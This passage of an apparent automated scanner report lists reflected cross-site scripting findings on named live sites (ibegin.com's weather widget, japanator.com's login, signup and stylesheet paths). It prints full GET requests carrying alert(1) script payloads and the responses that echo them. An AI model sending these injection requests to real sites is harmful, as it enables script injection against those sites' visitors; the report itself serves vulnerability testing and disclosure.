User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:45:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia6d844;alert(1)//2cee12dca9c-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('
...[SNIP]...

7.60. http://www.ibegin.com/weather/weather_widget.php [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the type request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1ac6d%3balert(1)//d4572dd3323 was submitted in the type parameter. This input was echoed as 1ac6d;alert(1)//d4572dd3323 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js1ac6d%3balert(1)//d4572dd3323&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:43:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js1ac6d;alert(1)//d4572dd3323-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

docu
...[SNIP]...

7.61. http://www.ibegin.com/weather/weather_widget.php [width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the width request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dbbf2%3balert(1)//d1a0397db91 was submitted in the width parameter. This input was echoed as dbbf2;alert(1)//d1a0397db91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175dbbf2%3balert(1)//d1a0397db91&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:50:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175dbbf2;alert(1)//d1a0397db91-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #
...[SNIP]...

7.62. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/index_cblogs-mini.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e6c0"><script>alert(1)</script>555ac0fda78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant9e6c0"><script>alert(1)</script>555ac0fda78/index_cblogs-mini.phtml?y=community&cblogs=1 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:02:50 GMT
Server: lighttpd/1.4.28
Content-Length: 112292


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant9e6c0"><script>alert(1)</script>555ac0fda78/index_cblogs-mini.phtml?y=community&cblogs=1&start=8&skip=features">
...[SNIP]...

7.63. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/index_cblogs-mini.phtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f287"><script>alert(1)</script>a7d08cc387 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/index_cblogs-mini.phtml6f287"><script>alert(1)</script>a7d08cc387?y=community&cblogs=1 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:03:14 GMT
Server: lighttpd/1.4.28
Content-Length: 112291


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/index_cblogs-mini.phtml6f287"><script>alert(1)</script>a7d08cc387?y=community&cblogs=1&start=8&skip=features">
...[SNIP]...

7.64. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2fa6"><script>alert(1)</script>af94a2890d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephantc2fa6"><script>alert(1)</script>af94a2890d1/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:59:49 GMT
Server: lighttpd/1.4.28
Content-Length: 112259


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephantc2fa6"><script>alert(1)</script>af94a2890d1/login.phtml?start=8&skip=features">
...[SNIP]...

7.65. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78865"><script>alert(1)</script>7ffcce37a66c81351 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /elephant78865"><script>alert(1)</script>7ffcce37a66c81351/login.phtml?back_to=&email_address=&password=&login=Login HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
Cache-Control: max-age=0
Origin: http://www.japanator.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:08:06 GMT
Server: lighttpd/1.4.28
Content-Length: 112355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant78865"><script>alert(1)</script>7ffcce37a66c81351/login.phtml?back_to=&email_address=&password=&login=Login&start=8&skip=features">
...[SNIP]...

7.66. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3961b"><script>alert(1)</script>5c60c7d19bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/login.phtml3961b"><script>alert(1)</script>5c60c7d19bc HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:00:10 GMT
Server: lighttpd/1.4.28
Content-Length: 112259


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/login.phtml3961b"><script>alert(1)</script>5c60c7d19bc?start=8&skip=features">
...[SNIP]...

7.67. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f69cc"><script>alert(1)</script>bf717c8e8da60b310 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /elephant/login.phtmlf69cc"><script>alert(1)</script>bf717c8e8da60b310?back_to=&email_address=&password=&login=Login HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
Cache-Control: max-age=0
Origin: http://www.japanator.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:08:29 GMT
Server: lighttpd/1.4.28
Content-Length: 112355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/login.phtmlf69cc"><script>alert(1)</script>bf717c8e8da60b310?back_to=&email_address=&password=&login=Login&start=8&skip=features">
...[SNIP]...

7.68. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b02ca"><script>alert(1)</script>24e2481c18d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephantb02ca"><script>alert(1)</script>24e2481c18d/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:08:47 GMT
Server: lighttpd/1.4.28
Content-Length: 112304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephantb02ca"><script>alert(1)</script>24e2481c18d/signup.phtml?start=8&skip=features">
...[SNIP]...

7.69. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12814"><script>alert(1)</script>d51c9eb6be2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/signup.phtml12814"><script>alert(1)</script>d51c9eb6be2 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:09:10 GMT
Server: lighttpd/1.4.28
Content-Length: 112304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/signup.phtml12814"><script>alert(1)</script>d51c9eb6be2?start=8&skip=features">
...[SNIP]...

7.70. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49269"><script>alert(1)</script>83ecb4f0d39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant49269"><script>alert(1)</script>83ecb4f0d39/templates/features.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:52 GMT
Server: lighttpd/1.4.28
Content-Length: 112282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant49269"><script>alert(1)</script>83ecb4f0d39/templates/features.css?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.71. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18bd8"><script>alert(1)</script>8bddb78b326 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/templates18bd8"><script>alert(1)</script>8bddb78b326/features.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:15 GMT
Server: lighttpd/1.4.28
Content-Length: 112282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/templates18bd8"><script>alert(1)</script>8bddb78b326/features.css?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.72. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a879d"><script>alert(1)</script>cba7f3ca990 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/templates/features.cssa879d"><script>alert(1)</script>cba7f3ca990?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:40 GMT
Server: lighttpd/1.4.28
Content-Length: 112282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/templates/features.cssa879d"><script>alert(1)</script>cba7f3ca990?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.73. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90f24"><script>alert(1)</script>50354e47f21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant90f24"><script>alert(1)</script>50354e47f21/templates/styles2011.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:54 GMT
Server: lighttpd/1.4.28
Content-Length: 112284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant90f24"><script>alert(1)</script>50354e47f21/templates/styles2011.css?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.74. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c144"><script>alert(1)</script>851007136eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/templates2c144"><script>alert(1)</script>851007136eb/styles2011.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:16 GMT
Server: lighttpd/1.4.28
Content-Length: 112284


